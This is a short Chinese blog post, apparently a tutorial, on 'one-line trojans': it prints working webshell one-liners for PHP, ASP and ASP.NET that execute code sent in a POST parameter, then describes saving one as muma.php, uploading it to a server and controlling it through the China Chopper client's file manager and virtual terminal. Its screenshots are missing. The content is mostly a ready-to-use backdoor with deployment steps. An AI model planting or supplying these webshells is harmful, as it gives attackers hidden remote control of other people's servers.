0x00 前言
一句话木马:
<?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>原理:
php的eval()函数:eval(
$
str)函数是把$str当做PHP代码执行。
0x01 实战
-
创建muma.php 然后将<?php @eval($_POST[‘pass’]);?>复制进去
- 然后上传到服务器中
3.上菜刀链接:
右击添加:
右击文件管理:
右击虚拟终端:
0x02 遇到的问题
在下图中,两个必须相同
版权声明:本文为milkway2013原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。